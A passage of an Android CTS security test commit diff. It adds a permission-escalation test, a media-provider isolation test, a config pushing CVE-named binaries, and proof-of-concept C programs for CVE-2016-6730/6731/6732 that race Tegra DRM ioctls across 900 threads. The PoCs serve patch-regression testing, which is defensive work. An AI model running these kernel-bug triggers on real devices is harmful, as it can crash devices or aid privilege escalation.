diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b1b7f83
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
@@ -0,0 +1,35 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_STATIC_JAVA_LIBRARIES := android-support-test
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := CtsEscalateToRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_PROGUARD_ENABLED := disabled
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..198bb39
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.escalate.permission">
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="dangerous"/>
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="dangerous"/>
+
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+ <application/>
+
+
+ <instrumentation
+ android:name="android.support.test.runner.AndroidJUnitRunner"
+ android:targetPackage="com.android.cts.escalate.permission" />
+
+</manifest>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
new file mode 100644
index 0000000..bd208bc
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Just need this dummy file to force building Manifest.java. -->
+<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
+ <string name="keysets_perm_desc">keysets_perm_description</string>
+</resources>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
new file mode 100644
index 0000000..bbe8e02
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.cts.escalatepermission;
+
+import android.content.Context;
+import android.content.pm.PermissionInfo;
+import android.support.test.InstrumentationRegistry;
+import android.support.test.runner.AndroidJUnit4;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static org.junit.Assert.assertSame;
+
+import com.android.cts.escalate.permission.Manifest;
+
+@RunWith(AndroidJUnit4.class)
+public class PermissionEscalationTest {
+ @Test
+ public void testCannotEscalateNonRuntimePermissionsToRuntime() throws Exception {
+ Context context = InstrumentationRegistry.getTargetContext();
+
+ // Ensure normal permission cannot be made dangerous
+ PermissionInfo stealAudio1Permission1 = context.getPackageManager()
+ .getPermissionInfo(Manifest.permission.STEAL_AUDIO1, 0);
+ assertSame("Shouldn't be able to change normal permission to dangerous",
+ PermissionInfo.PROTECTION_NORMAL, (stealAudio1Permission1.protectionLevel
+ & PermissionInfo.PROTECTION_MASK_BASE));
+
+ // Ensure signature permission cannot be made dangerous
+ PermissionInfo stealAudio1Permission2 = context.getPackageManager()
+ .getPermissionInfo(Manifest.permission.STEAL_AUDIO2, 0);
+ assertSame("Shouldn't be able to change signature permission to dangerous",
+ PermissionInfo.PROTECTION_SIGNATURE, (stealAudio1Permission2.protectionLevel
+ & PermissionInfo.PROTECTION_MASK_BASE));
+ }
+ }
diff --git a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
index d9f00d2..3cf1443 100644
--- a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
+++ b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
@@ -17,15 +17,20 @@
package com.android.cts.multiuserstorageapp;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertDirNoAccess;
+import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertFileNoAccess;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.getAllPackageSpecificPathsExceptObb;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.readInt;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.writeInt;
+import android.content.ContentResolver;
+import android.content.ContentValues;
+import android.net.Uri;
import android.os.Environment;
import android.test.AndroidTestCase;
import android.util.Log;
import java.io.File;
+import java.io.FileNotFoundException;
/**
* Test multi-user emulated storage environment, ensuring that each user has
@@ -138,6 +143,36 @@
}
}
+ /**
+ * Verify that files cannot be accessed through media provider.
+ */
+ public void testMediaProviderUserIsolation() throws Exception {
+ final File myPath = Environment.getExternalStorageDirectory();
+ final int myId = android.os.Process.myUid() / 100000;
+ assertEquals(String.valueOf(myId), myPath.getName());
+
+ Log.d(TAG, "My path is " + myPath + " user id " + myId);
+ final File basePath = myPath.getParentFile();
+ for (int i = 0; i < 128; i++) {
+ if (i == myId) continue;
+ final File otherPath = new File(basePath,i + "/" + FILE_SINGLETON);
+ assertFileNoAccess(otherPath);
+
+ final String URI_MEDIA_STRING = "content://media/external/audio/media/";
+ ContentResolver contentResolver = mContext.getContentResolver();
+ ContentValues cv = new ContentValues();
+ cv.put("_data", otherPath.getAbsolutePath());
+ contentResolver.insert(Uri.parse(URI_MEDIA_STRING), cv);
+
+ try {
+ mContext.getContentResolver().openInputStream(Uri.parse(URI_MEDIA_STRING));
+ fail("Accessing through media provider should not be allowed. Path " + myPath);
+ } catch (FileNotFoundException expected) {
+ // OK
+ }
+ }
+ }
+
private File buildApiObbPath(String file) {
return new File(getContext().getObbDir(), file);
}
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 0056e81..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -14,6 +14,38 @@
limitations under the License.
-->
<configuration description="Config for the CTS Security host tests">
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+ <option name="cleanup" value="true" />
+ <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+ <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+ <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+ <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+ <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+ <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+ <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+ <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+ <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+ <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+ <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+ <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+ <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+ <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+ <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+ <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+ <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+ <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+ <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+ <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+ <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+ <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
+ <option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+ <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+ <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+ <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+ <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+ <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+ <option name="append-bitness" value="true" />
+ </target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityHostTestCases.jar" />
<option name="runtime-hint" value="32s" />
diff --git a/hostsidetests/security/securityPatch/Android.mk b/hostsidetests/security/securityPatch/Android.mk
new file mode 100644
index 0000000..41a41d0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Android.mk
@@ -0,0 +1,17 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+include $(call all-subdir-makefiles)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
new file mode 100644
index 0000000..14337ab
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6730
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
new file mode 100644
index 0000000..bfcdb41
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
@@ -0,0 +1,164 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_GET_CLK_CONSTRAINT 0x12
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
new file mode 100644
index 0000000..718dbe3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6731
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
new file mode 100644
index 0000000..d6cedfb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SET_CLK_CONSTRAINT 0x13
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+ puts("ran 1");
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ puts("ran 2");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
new file mode 100644
index 0000000..03b7b87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6732
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
new file mode 100644
index 0000000..5b8ea8e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define THREAD_NUM 900
+#define TRY_TIMES 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
